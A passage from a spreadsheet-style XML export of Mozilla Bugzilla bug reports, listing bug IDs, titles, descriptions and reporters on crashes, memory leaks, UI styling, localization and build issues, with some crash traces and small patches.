There's one closing-braket that doesn't match there are two opening and three closing.
Section: Error handling Return from errors immediately (first code sample).
rv = foo-&gt;Call1()
if (NS_SUCCEEDED(rv)) {
    rv = foo-&gt;Call2()
        if (NS_SUCCEEDED(rv)) {
            rv = foo-&gt;Call3()
        }
    } // unmatched.
}
return rv</t>
  </si>
  <si>
    <t>gonzaloarreche</t>
  </si>
  <si>
    <t>FIREFOX-524611</t>
  </si>
  <si>
    <t>restyle the synced tabs page</t>
  </si>
  <si>
    <t>Right now (0.8pre2) the synced tabs page looks like this:
http://www.flickr.com/photos/madhava_work/4047855141/
The row styling with titles URLs and and the cloud favicons should be styled like the rows here:
http://www.flickr.com/photos/madhava_work/4048642538/
(so grey lines going all the way across row height being 6mm 32px favicon (this is a bit different from the screenshot but it's what we're heading to)
With the section dividers styled like these ones:
http://www.flickr.com/photos/madhava_work/4048643468/in/photostream/</t>
  </si>
  <si>
    <t>FIREFOX-244760</t>
  </si>
  <si>
    <t>clean (both profile and firefox directory) branch build first page is http://whyfiles.org</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040525 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040525 Firefox/0.8.0+
I tried the branch build for firefox using a clean profile (renamed the old
firefox directory). Unzipped the 20040525 zip file and started firefox. The
first page that loaded was http://whyfiles.org.
Reproducible: Didn't try
Steps to Reproduce:
1.Clean profile and firefox directory.
2.Unzip firefox 20040525 win32 branch build.
3.Start Firefox and it takes you to http://whyfiles.org
Actual Results:  
First page is http://whyfiles.org
Expected Results:  
Go to the www.mozilla.org/projects/firefox/ homepage or about:blank.
I am not the only one with this bug read this thread for more information
http://forums.mozillazine.org/viewtopic.php?t=79754&amp;postdays=0&amp;postorder=asc&amp;postsperpage=15&amp;start=30</t>
  </si>
  <si>
    <t>edgrale</t>
  </si>
  <si>
    <t>CORE-238492</t>
  </si>
  <si>
    <t xml:space="preserve">No way to cancel a button click when the  is placed inside a </t>
  </si>
  <si>
    <t>Neil discovered this while reviewing my patch for bug 233791. When a  is
placed inside a  you can't cancel a button click by moving away the mouse
pointer from the button.
Scott already checked in the patch for bug 233791 to Thunderbird so the junk
button in Thunderbird currently exposes this bug. :-(
This bug is present in both XPFE and Toolkit.
I'm going to attach a testcase in a minute.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-478307</t>
  </si>
  <si>
    <t>talos machines unreachable.</t>
  </si>
  <si>
    <t>Can't ssh/vnc probably just needs a reboot.</t>
  </si>
  <si>
    <t>CORE-761397</t>
  </si>
  <si>
    <t>[Azure][D2D] Reduce churn on surface creation for PushGroup/PopGroup/Clipping</t>
  </si>
  <si>
    <t>Surface creation is expensive for GPU drawing systems. I should do some work to reduce the amount of surface creations for clipping that can be done simply by caching ID2D1Layer objects. For the Azure-Thebes wrapper it should probably be done inside the gfxContext wrapper.</t>
  </si>
  <si>
    <t>CORE-421266</t>
  </si>
  <si>
    <t>Useless result parameter for js_Interpret</t>
  </si>
  <si>
    <t>Currently js_Interpret has the following signature:
extern JSBool
js_Interpret(JSContext *cx jsbytecode *pc jsval *result)
Here the result is only ever used by JSOP_POPV bytecode that is when the interpreter runs a script not a function and when js_Execute calls js_Interpret like in:
    /*
     * Use frame.rval not result so the last result stays rooted across any
     * GC activations nested within this js_Interpret.
     */
    ok = js_Interpret(cx script-&gt;code 
Thus the result parameter in the relevant cases is fp-&gt;rval and can be dropped with JSOP_POPV adjusted to store the result in fp-&gt;rval.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-462050</t>
  </si>
  <si>
    <t>load the microsummary service after delayedStartup w/ other non-essential services</t>
  </si>
  <si>
    <t>Created attachment 345166
delay 4 seconds
this patch delays the initialization of the microsummary service until a few seconds after chrome comes up. ryan's trace showed it took 4ms at startup.
loading microsummaries is likely to delay a few seconds as they're not critical to startup and are usually refreshed on a delay anyway.
myk are there any reasons you can think of why this would be a bad idea?</t>
  </si>
  <si>
    <t>TOOLKIT-254339</t>
  </si>
  <si>
    <t>Relative URI misinterpreted by InstallTrigger.install()</t>
  </si>
  <si>
    <t>Relative URIs passed to InstallTrigger.install() seem to be interpreted
incorrectly.  Here is an example:
InstallTrigger.install( { My Ext : /cgi-bin/dl?c=123 } )
Suppose the above JS is executed from the page
http://example.com/cgi-bin/register.  Then the Firefox Software Installation
dialog will display http://example.com/cgi-bin//cgi-bin/dl?c=123 (notice the two
copies of cgi-bin).  If a full URI is used there is no problem e.g.
InstallTrigger.install( { My Ext : http://example.com/cgi-bin/dl?c=123 } )
This problem happens in Firefox 0.9.1 and 0.9.2 (Windows and Mac) but not with
Mozilla 1.7 or Mozilla trunk builds.</t>
  </si>
  <si>
    <t>FIREFOX-348565</t>
  </si>
  <si>
    <t>Icons with Text feature misaligned</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1b1) Gecko/20060813 BonEcho/2.0b1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1b1) Gecko/20060813 BonEcho/2.0b1
It appears it won't allow the space for Icons and Text feature.  Just Icons or Text is ok.
Reproducible: Always</t>
  </si>
  <si>
    <t>pcmedic</t>
  </si>
  <si>
    <t>FIREFOX-343587</t>
  </si>
  <si>
    <t>what's a good toolkit.scrollbox.clickToScroll.scrollDelay default?</t>
  </si>
  <si>
    <t>what's a good toolkit.scrollbox.clickToScroll.scrollDelay default?
asaf suggested I ping the usual suspects for a recommendation.
this comes from bug #342906 where I've chosen a 200 ms slack timer.
asaf thinks 100 ms.
note each time the timer fires (while you are clicking and holding the scroll button) we'll scroll a tab at at time.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-370943</t>
  </si>
  <si>
    <t>Sunbird: Categories are broken</t>
  </si>
  <si>
    <t>The pref calendar.category.names is missing in sunbird-l10n.js. This prevents Categories in Sunbird from functioning.
There are also other entries missing in the same file such as calendar.week.start and default days off</t>
  </si>
  <si>
    <t>FIREFOX-257859</t>
  </si>
  <si>
    <t>[AltSS] Re-insert Alternate Stylesheet UI</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040825 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.2) Gecko/20040825 Firefox/0.9.1+
From Bug 253722 Comment #1:
&gt; see also bug 216537 bug 253332 bug 216424 bug 224250 bug 220649
&gt; bug 83663
&gt; and bug 220975.
Only enhancements to the Alternate Stylesheet functionality and UI remain now
any chance we can have it back by default in Firefox? I know Blake's post is for
the purpose of debating but I figure it needs a bug and votes to make any
difference now (since the post is rapidly degenerating).
Please don't wontfix this unless you intend to permanently remove the AltSS
functionality and/or UI.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-149992</t>
  </si>
  <si>
    <t>_IMPL_NS_COM_OFF needs to be replaced with XPCOM_GLUE</t>
  </si>
  <si>
    <t>DIRECTORY-360035</t>
  </si>
  <si>
    <t>server response controls lost in referral chase</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Build Identifier: 
A client product fails to mention that the password has expired or needs changing when a bind has been referred.
It looks like the result messages of referred operations (child requests) get rebuilt with just the message ID message type errno matched DN and error message.  At that point we lose any server response controls including password policy controls.
Bug 231705 might be referring to this it talks about the page control but I believe it's a more generic issue since the page cookie comes back in a control in the the search result.  But since I haven't tested with the page control I wont assume it's the same.
Reproducible: Always</t>
  </si>
  <si>
    <t>ulf</t>
  </si>
  <si>
    <t>MARKETING-247947</t>
  </si>
  <si>
    <t>Testimonial: Thanks for having made computing fun again</t>
  </si>
  <si>
    <t>-------- Original Message --------
Subject: 	Thanks for having made computing fun again
Date: 	Sat 19 Jun 2004 09:48:28 +0700
From: 	Governor 
Reply-To: 	mglatz@cscoms.com
To: 	webmaster@mozilla.org
Dear friends
Thanks for Mozilla and especially for Calendar.  For years I had to maintain a
copy of Microsoft Office in my computer just to be able to have Schedule+ which
I liked  and depended on a lot.
Now finally I have the solution by having Mozilla Calendar and of course Open
Office.org 1.1 to replace all that crazy stuff I never needed or used.
Thanks again.
Michael in Thailand</t>
  </si>
  <si>
    <t>rachelh</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-223985</t>
  </si>
  <si>
    <t>splenda.com - malformed HTML comment breaks page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20031002 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6a) Gecko/20031002 Firebird/0.7+
It will not display thr form correctly (ie displays two buttons at the bottom
and items on lower combo box)
http://www.splenda.com/vcrc/email/emailform.jhtml
Reproducible: Always
Steps to Reproduce:
1.go to URL
2.Look at bottom
3.missing submit/clear buttons
Actual Results:  
no buttons combo box items
Expected Results:  
two buttons and product group combo are there</t>
  </si>
  <si>
    <t>altarace</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-500011</t>
  </si>
  <si>
    <t>access keys are used more than once in security options page</t>
  </si>
  <si>
    <t>in the ff3.5 options window security page the letter ×– is used twice: in ×”×–×”×¨ ××•×ª×™ ×›××©×¨ ××ª×¨×™× ×ž× ×¡×™× ×œ×”×ª×§×™×Ÿ ×ª×•×¡×¤×•×ª and in ×—×¡×•× ××ª×¨×™× ×©×“×•×•×—×• ×›××ª×¨×™ ×–×™×•×£. instead × could be used for either of them.
on the same page the letter ×¡ is used at ×–×›×•×¨ ×¡×™×¡×ž××•×ª ×œ××ª×¨×™× and the ×¡×™×¡×ž××•×ª ×©×ž×•×¨×•×ª button. ×› could be used for the former.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-181045</t>
  </si>
  <si>
    <t>Release Notes (0.6 ~ 1.4) link to RedHat compat-libstdc++ RPM gets 404 error.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Linux U) Opera 6.0  [en]
Build Identifier: N/A: Documentation error
The release notes include a link to: 
http://www.redhat.com/swr/i386/compat-libstdc++-6.2-2.9.0.9.i386.html and this 
link gets a 404 not found error.  The same package can be gotten from 
RPMfind.net at 
ftp://ftp.rpmfind.net/linux/redhat/7.3/en/os/i386/RedHat/RPMS/compat-libstdc++-6.2-2.9.0.16.i386.rpm
Reproducible: Always
Steps to Reproduce:
1.  Load the URL http://www.mozilla.org/releases/mozilla1.2b/#compatible in 
any browser.
2. Click on the RedHat Standard C++ Libraries download link
3.
Actual Results:  
Web page got 404 error
Expected Results:  
Not a browser bug.
Here's the diff information produced by Doctor when I tried to edit the 
Release Notes directly.  I didn't have the access to directly comit these 
changes.
Index: mozilla-org/html/releases/mozilla1.2b/index.html
===================================================================
RCS file: /cvsroot/mozilla-org/html/releases/mozilla1.2b/index.htmlv
retrieving revision 1.7
diff -u -r1.7 index.html
--- mozilla-org/html/releases/mozilla1.2b/index.html3 Nov 2002 23:36:26 
-00001.7
+++ mozilla-org/html/releases/mozilla1.2b/index.html20 Nov 2002 07:48:13 
-0000
@@ -37 +36 @@ -
     Mozilla 1.2b Release Notes
@@ -3548 +35310 @@
 For Red Hat Linux 7 you must install the Standard C++ libraries for 
Red Hat
   6.x compatibility. Get the package from the Red Hat 7 
installation
-  CD or download it from &lt;a 
href=http://www.redhat.com/swr/i386/compat-libstdc++-6.2-2.9.0.9.i386.html&gt;
-  Red Hat.
+  CD or download it from
+
+&lt;!-- &lt;a 
href=http://www.redhat.com/swr/i386/compat-libstdc++-6.2-2.9.0.9.i386.html&gt;
+  Red Hat --&gt; &lt;a 
href=ftp://ftp.rpmfind.net/linux/redhat/7.3/en/os/i386/RedHat/RPMS/compat-libstdc++-6.2-2.9.0.16.i386.rpm&gt;Rpmfind.Net.
   (Bug &lt;a href=http://bugzilla.mozilla.org/show_bug.cgi?id=59012 
title=Bug 59012 - Redhat 7 users must install 
compat-libstdc++6.2-2.9.0.9&gt;59012)</t>
  </si>
  <si>
    <t>CORE-436158</t>
  </si>
  <si>
    <t>ActionMonkey: perf: don't collect garbage during SunSpider</t>
  </si>
  <si>
    <t>According to profiling GC::Alloc triggers garbage collection during SunSpider tests.  SpiderMonkey doesn't.  It shouldn't be necessary.</t>
  </si>
  <si>
    <t>CORE-372768</t>
  </si>
  <si>
    <t>{inc}Setting nowrap attribute dynamically does not change layout like it should</t>
  </si>
  <si>
    <t>The testcase is based on reftests/bugs/362594-1a.html.  Quirks-only?</t>
  </si>
  <si>
    <t>TOOLKIT-491196</t>
  </si>
  <si>
    <t>don't implement static functions in headers</t>
  </si>
  <si>
    <t>CORE-422960</t>
  </si>
  <si>
    <t>Add jemalloc_stats() and jemalloc.h</t>
  </si>
  <si>
    <t>Created attachment 309453
Add jemalloc_stats() and jemalloc.h
This functionality was requested by Stuart Parmenter with the intention that it be used to enhance the about:memory output.  Consumers of jemalloc_stats() need to include the jemalloc.h header as well as link to libjemalloc (OS X only).
The patch modifies js/src/jsgc.c to use jemalloc.h rather than manually declare a posix_memalign() prototype.  This is a cleanup for Windows and a compilation fix for OS X (for which the change to js/src/Makefile.in is also necessary).</t>
  </si>
  <si>
    <t>CORE-522760</t>
  </si>
  <si>
    <t>js/src/tests/ecma_5 tests should not run as JavaScript 1.5</t>
  </si>
  <si>
    <t>At the moment the tests in js/src/tests/ecma_5 run as JavaScript 1.5 because the call 'version(150)' in js/src/tests/shell.js is still in effect.  It seems like 1.8 would be a more reasonable default for the ecma_5 tree.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-306792</t>
  </si>
  <si>
    <t>the server gave an error ERROR!! This extension does NOT belong to the author logged in.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.10) Gecko/20050716 Firefox/1.0.6
I was trying to upload a new version of my extension (print.xpi). But the server
gave an error:
ERROR!! This extension does NOT belong to the author logged in.
I originally wrote this Print extension sometime last year long before the
Developer Control Panel website was created. So now I created a new account and
tried to upload the new version but always received the above error.
Reproducible: Always
Steps to Reproduce:
1.Log on to Developer Control Panel web site
(https://addons.mozilla.org/developers/)
2.Click on Add New Extension... link
3.Browse to an appropriate extension file (print.xpi)
4.Click Next button
Actual Results:  
Received the following error:
ERROR!! This extension does NOT belong to the author logged in.
Terminating...
Expected Results:  
Upload my extension to the server.</t>
  </si>
  <si>
    <t>jeeradej</t>
  </si>
  <si>
    <t>CORE-512516</t>
  </si>
  <si>
    <t>Abort on startup: Assertion failure: JSVAL_IS_OBJECT(v) at /mozilla/js/src/jsapi.h:183</t>
  </si>
  <si>
    <t>After updating my debug build this morning I've started hitting this assertion/abort on Firefox startup:
&gt; Assertion failure: JSVAL_IS_OBJECT(v) at /mozilla/js/src/jsapi.h:183
&gt; Trace/breakpoint trap
This is in a debug build at revision 2f27256aa154.
Platform is Ubuntu 9.04 (Linux).
I'm invoking firefox with no arguments and with a fresh profile.
I suspect this morning's Tracemonkey merge...
http://hg.mozilla.org/mozilla-central/rev/189759c41621</t>
  </si>
  <si>
    <t>SEAMONKEY-370387</t>
  </si>
  <si>
    <t>In Advanced/General/Choose en-US (set via intl.accept_languages) is not match to en-us</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8.1.1) Gecko/20061221 Firefox/2.0.0.1
Build Identifier: Mozilla/5.0 (X11 U SunOS sun4u en-US rv:1.8.1.1) Gecko/20061221 Firefox/2.0.0.1
Advanced/General/Choose does not perform language tag matching in a case-insensitive manner: It does e.g. not match en-US (set via intl.accept_languages) to en-us (English/United States) instead it simly displays en-US without the explanatory (English/United States) text.
But language tags are case-insensitive -- and uppercase country subtags are actually preferred (FWIW: maybe you could follow this convention as well.)
Reproducible: Always
Steps to Reproduce:
1. Set (using about:config) intl.accept_languages to en-US
2. Open Preferences/Advanced/General/Choose...
Actual Results:  
The languages in order of prefernece list now contains an en-US entry 
Expected Results:  
I would have expected to see either en-US (English/United States) or en-us (English/United States) since language tags are case-insensitive and hence a match for en-US ought to be found.
I stumbled upon this problem when manually setting intl.accept_languages to include de-DE-1901 as well doing that I also normalized the country subtags to uppercase.</t>
  </si>
  <si>
    <t>bugzilla2005</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-237844</t>
  </si>
  <si>
    <t>nsSecureBrowserUIImpl::~nsSecureBrowserUIImpl doesn't need to removeObserver</t>
  </si>
  <si>
    <t>mozilla pre1.7a opt profile build wxp
i'm running mozilla under purify and it has a tendency to crash following this:
        [E] IPR: Invalid pointer read in nsCOMPtr_base::~nsCOMPtr_base(void) {1 
occurrence}
            Reading 4 bytes from 0x0d509c6c (4 bytes at 0x0d509c6c illegal)
            Address 0x0d509c6c points into a HeapAlloc'd block in unallocated 
region of heap 0x00ed0000
            Thread ID: 0x8f4
            Error location
            nsCOMPtr_base::~nsCOMPtr_base(void)+0x1c 
[r:\cenzic\mozilla\xpcom\glue\nscomptr.cpp:64 ip=0x01d16910]
            nsSecureBrowserUIImpl::~nsSecureBrowserUIImpl(void)+0x245 
[r:\cenzic\mozilla\security\manager\boot\src\nssecurebrowseruiimpl.cpp:158 
ip=0x05852ab7]
            nsSecureBrowserUIImpl::`scalar deleting destructor'(UINT)+0x1a 
[C:\Documents and Settings\josh\root\cenzic\mozilla\rel-i586-pc-
msvc\dist\bin\components\pipboot.dll ip=0x0585462d]
            nsSecureBrowserUIImpl::Release(void)+0x52 
[r:\cenzic\mozilla\security\manager\boot\src\nssecurebrowseruiimpl.cpp:166 
ip=0x05851750]
            XPCJSRuntime::GCCallback(JSContext *JSGCStatus)+0xf18 
[r:\cenzic\mozilla\js\src\xpconnect\src\xpcjsruntime.cpp:556 ip=0x04f37fe2]
            jsds_GCCallbackProc+0xa8 [r:\cenzic\mozilla\js\jsd\jsd_xpc.cpp:518 
ip=0x05355018]
            js_GC+0x1d90         [r:\cenzic\mozilla\js\src\jsgc.c:1419 
ip=0x041c5a97]
            ???            [ip=0x086d9810]
            js_ForceGC+0x83      [r:\cenzic\mozilla\js\src\jsgc.c:1000 
ip=0x041c5f06]
            JS_GC+0xad           [r:\cenzic\mozilla\js\src\jsapi.c:1684 
ip=0x04176f5f]
[E] IPR: Invalid pointer read in nsCOMPtr_base::~nsCOMPtr_base(void) {1 
occurrence}
        Reading 4 bytes from 0xaeaeaeb6 (4 bytes at 0xaeaeaeb6 illegal)
        Address 0xaeaeaeb6 points into invalid memory 
        Thread ID: 0x8f4
        Error location
            nsCOMPtr_base::~nsCOMPtr_base(void)+0x3b 
[r:\cenzic\mozilla\xpcom\glue\nscomptr.cpp:64 ip=0x01d1692f]
            nsCOMPtr_base::~nsCOMPtr_base(void)+0x31 
[r:\cenzic\mozilla\xpcom\glue\nscomptr.cpp:64 ip=0x01d16925]
            nsSecureBrowserUIImpl::~nsSecureBrowserUIImpl(void)+0x245 
[r:\cenzic\mozilla\security\manager\boot\src\nssecurebrowseruiimpl.cpp:158 
ip=0x05852ab7]
            nsSecureBrowserUIImpl::`scalar deleting destructor'(UINT)+0x1a 
[C:\Documents and Settings\josh\root\cenzic\mozilla\rel-i586-pc-
msvc\dist\bin\components\pipboot.dll ip=0x0585462d]
            nsSecureBrowserUIImpl::Release(void)+0x52 
[r:\cenzic\mozilla\security\manager\boot\src\nssecurebrowseruiimpl.cpp:166 
ip=0x05851750]
            XPCJSRuntime::GCCallback(JSContext *JSGCStatus)+0xf18 
[r:\cenzic\mozilla\js\src\xpconnect\src\xpcjsruntime.cpp:556 ip=0x04f37fe2]
            jsds_GCCallbackProc+0xa8 [r:\cenzic\mozilla\js\jsd\jsd_xpc.cpp:518 
ip=0x05355018]
            js_GC+0x1d90         [r:\cenzic\mozilla\js\src\jsgc.c:1419 
ip=0x041c5a97]
            ???            [ip=0x086d9810]
            js_ForceGC+0x83      [r:\cenzic\mozilla\js\src\jsgc.c:1000 
ip=0x041c5f06]
The code is:
nsSecureBrowserUIImpl::~nsSecureBrowserUIImpl()
{
  nsresult rv
  // remove self from form post notifications:
  nsCOMPtr svc(do_GetService(@mozilla.org/observer-
service1 
  if (NS_SUCCEEDED(rv)) {
    svc-&gt;RemoveObserver(this NS_FORMSUBMIT_SUBJECT)
  }
  if (mTransferringRequests.ops) {
    PL_DHashTableFinish(
    mTransferringRequests.ops = nsnull
  }
}
NS_IMPL_ISUPPORTS6(nsSecureBrowserUIImpl
                   nsISecureBrowserUI
                   nsIWebProgressListener
                   nsIFormSubmitObserver
                   nsIObserver
                   nsISupportsWeakReference
                   nsISSLStatusProvider)
From the excerpt you can see that nsSecureBrowserUIImpl implements 
weakreference and is trying to ask the observerservice to unregister itself as 
part of its destructor.</t>
  </si>
  <si>
    <t>CORE-338477</t>
  </si>
  <si>
    <t>implement whatwg isPointInPath get/putImageData APIs</t>
  </si>
  <si>
    <t>Need to implement these recently-added methods to the canvas spec.  The first performs testing of whether the given point is within the current path get/putImageData allow for raw access to the canvas pixel values.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-121430</t>
  </si>
  <si>
    <t>vertalen: Help | ssl_page_info_help.html</t>
  </si>
  <si>
    <t>T.C.Witte</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-124076</t>
  </si>
  <si>
    <t>nsJSProtocolHandler.cpp doesn't set filename</t>
  </si>
  <si>
    <t>Build ID: 2002-02-06-09 RedHat 7.2
Summary: JS Debugger (Venkman) doesn't get stack info for 'javascript:' urls.
Steps to Reproduce:
1.  Launch the JS Debugger.
2.  Type 'javascript: d = new Date()' (minus the single quote) into the URL
field of the browser.
3.  Attempt to get stack info for the variable 'd'.
Actual Results:
No information appears in the debugger.
Expected Results:
Show the standard scoping values etc. in the debugger.</t>
  </si>
  <si>
    <t>CORE-340683</t>
  </si>
  <si>
    <t>Since cairo update 16bpp does not work in Linux</t>
  </si>
  <si>
    <t>SEAMONKEY-351063</t>
  </si>
  <si>
    <t>navigator.userAgent shows just / for suiterunner's extra portion (browser-prefs.js not preprocessed correctly)</t>
  </si>
  <si>
    <t>Either apply various fixes to get about: working or go into the error console on suiterunner and type
navigator.userAgent
The string you'll get back will look like:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060901 /
instead of:
Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060901 SeaMonkey/1.5a
The problem is that we haven't got some required defines in one of the makefiles.
It turns out we're not preprocessing browser-prefs.js correctly as app.releaseNotesURL is also wrong.</t>
  </si>
  <si>
    <t>CORE-56713</t>
  </si>
  <si>
    <t>Bulletproof common crash in [@ nsXULDocument::ResumeWalk]</t>
  </si>
  <si>
    <t>Talkback is reporting a common crash for this stack trace in current builds. 
(I don't have any steps to reproduce this but some comments indicate that 
this is happening on startup):
nsXULDocument::ResumeWalk 
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp line 5131]
nsXULDocument::ParserObserver::OnStopRequest 
[d:\builds\seamonkey\mozilla\rdf\content\src\nsXULDocument.cpp line 6474]
nsParser::OnStopRequest 
[d:\builds\seamonkey\mozilla\htmlparser\src\nsParser.cpp line 2401]
nsJARChannel::OnStopRequest 
[d:\builds\seamonkey\mozilla\netwerk\protocol\jar\src\nsJARChannel.cpp line 
703]
nsOnStopRequestEvent::HandleEvent 
[d:\builds\seamonkey\mozilla\netwerk\base\src\nsAsyncStreamListener.cpp line 
302]
nsStreamListenerEvent::HandlePLEvent 
[d:\builds\seamonkey\mozilla\netwerk\base\src\nsAsyncStreamListener.cpp line 
106]
PL_HandleEvent [d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c line 577]
PL_ProcessPendingEvents [d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c 
line 513]
_md_EventReceiverProc [d:\builds\seamonkey\mozilla\xpcom\threads\plevent.c 
line 1055]
nsAppShellService::Run 
[d:\builds\seamonkey\mozilla\xpfe\appshell\src\nsAppShellService.cpp line 408]
main1 [d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp line 1038]
main [d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp line 1215]
WinMain [d:\builds\seamonkey\mozilla\xpfe\bootstrap\nsAppRunner.cpp line 1233]
WinMainCRTStartup()   
KERNEL32.DLL + 0x7903 (0x77e57903) 
The code at that location is this:
5124        // content that we can simply build the delegates
5125        // and attach them to the parent node.
5126        rv = CreateElement(protoele getter_AddRefs(child))
5127        if (NS_FAILED(rv)) return rv
5128  
5129        // ...and append it to the content model.
5130        rv = element-&gt;AppendChildTo(child PR_FALSE)   &lt;-- Boom!
5131        if (NS_FAILED(rv)) return rv
5132 
On bug 35568 Seth proposed a simple bulletproofing fix to assert and
bail out 'if (!element)'. We could probably do the same fix for this 
crash.
Index: nsXULDocument.cpp
===================================================================
RCS file: /cvsroot/mozilla/rdf/content/src/nsXULDocument.cppv
retrieving revision 1.352
diff -u -r1.352 nsXULDocument.cpp
--- nsXULDocument.cpp   2000/10/09 03:08:28     1.352
+++ nsXULDocument.cpp   2000/10/15 07:24:59
@@ -51266 +51269 @@
                     rv = CreateElement(protoele getter_AddRefs(child))
                     if (NS_FAILED(rv)) return rv
+                    NS_ASSERTION(elementelement is null)
+                    if (!element) return NS_ERROR_FAILURE
+
                     // ...and append it to the content model.
                     rv = element-&gt;AppendChildTo(child PR_FALSE)
                     if (NS_FAILED(rv)) return rv
(or there was some discussion on that other bug that perhaps
this should be done earlier at the point where mContextStack.Peek
fails to get the element.)
Nominate for RTM to avoid what Talkback says is a common crash.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-924274</t>
  </si>
  <si>
    <t>Gaia::Contacts</t>
  </si>
  <si>
    <t>[Contacts] Add testing to catch recent regressions in the future</t>
  </si>
  <si>
    <t>There have been reports of regressions since bug 907907 landed. It's apparent that we did not have a proper testing suite or we would have caught these issues.
I am more than happy to write tests for these regressions if we have not done so - please let me know what regressions we've been seeing.</t>
  </si>
  <si>
    <t>kevin+bugzilla</t>
  </si>
  <si>
    <t>CORE-381777</t>
  </si>
  <si>
    <t>Crash loading SVG filter testcase [@ gfxImageSurface::Data]</t>
  </si>
  <si>
    <t>Loading https://bugzilla.mozilla.org/attachment.cgi?id=245850 crashes Firefox (Mac trunk debug).  This is a regression from the last week or so.</t>
  </si>
  <si>
    <t>BUGZILLA-163494</t>
  </si>
  <si>
    <t>runtests.sh needs a switch to include optional modules</t>
  </si>
  <si>
    <t>Recently HEAD has had incidents where checked-in code would not even compile
but was not detected by runtests.sh or tinderbox
This seems to be because runtests.sh cannot presume that everyone has optional
modules installed.   Runtests needs an option (which tinderbox should use) that
assures it that all the optional module dependencies are satisfied and it should
check all of the modules.</t>
  </si>
  <si>
    <t>FIREFOX-411821</t>
  </si>
  <si>
    <t>Foxmarks Bookmark Synchronizer addon not available/working for Firefox 3</t>
  </si>
  <si>
    <t>https://addons.mozilla.org/firefox/2410/</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-240670</t>
  </si>
  <si>
    <t>memory leak in MIME_DecodeMimeHeader [</t>
  </si>
  <si>
    <t>I think the new string handling stuff in mailnews caused this leak (just a
guess). I have a fix here's the leak.
[W] MLK: Memory leak of 3231 bytes from 40 blocks allocated in PL_strdup [PLC4.DLL]
        Distribution of leaked blocks
        Allocation location
            malloc         [dbgheap.c:129]
            PL_strdup      [strdup.c:46]
            nsCRT::strdup(char const*) [nsCRT.h:172]
            MIME_DecodeMimeHeader [comi18n.cpp:737]
                  rv = mimehdrpar-&gt;DecodeRFC2047Header(header default_charset
override_charset
                                                       eatContinuations result)
                  if (NS_SUCCEEDED(rv))
             =&gt;     return nsCRT::strdup(result.get())
                  return nsnull
                }
            MimeHeaders_convert_header_value [mimehdrs.cpp:74]
                  if (opt &amp;&amp; opt-&gt;rfc1522_conversion_p)
                  {
                    converted = MIME_DecodeMimeHeader(value.get()
opt-&gt;default_charset
             =&gt;                                       opt-&gt;override_charset
PR_TRUE)
                    if (converted)
                    {
            MimeHeaders_write_all_headers(MimeHeaders *MimeDisplayOptions
*int) [mimehdrs.cpp:595]</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-183207</t>
  </si>
  <si>
    <t>hp.com - hp software depot returns wrong mime type</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Evangelism: Bug in the hp cgi script. Returns the mime 
type application/x-perl instead of text/html.
Reproducible: Always
Steps to Reproduce:
1. click on link
2. mozilla asks for file download
3.
Expected Results:  
hp to fix their web site
This does not effect IE as it is probably peeking at
the returned content and does not use the mime type.
As an effect the web site if broken for Mozilla users.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-244073</t>
  </si>
  <si>
    <t>Unable to find mailman configuration pages on Mozilla.org</t>
  </si>
  <si>
    <t>I'm trying to locate my password for a mozilla.org mailing list.  I know we have
this mailman system with a web UI to request the password but I don't have the
URI for it.  I have tried the following:
1)  Search for mailman on mozilla.org -- no luck
2)  Search for mailing lists on mozilla.org -- I find
    http://www.mozilla.org/community/developer-forums.html which has no links to
    the list maintenance stuff.
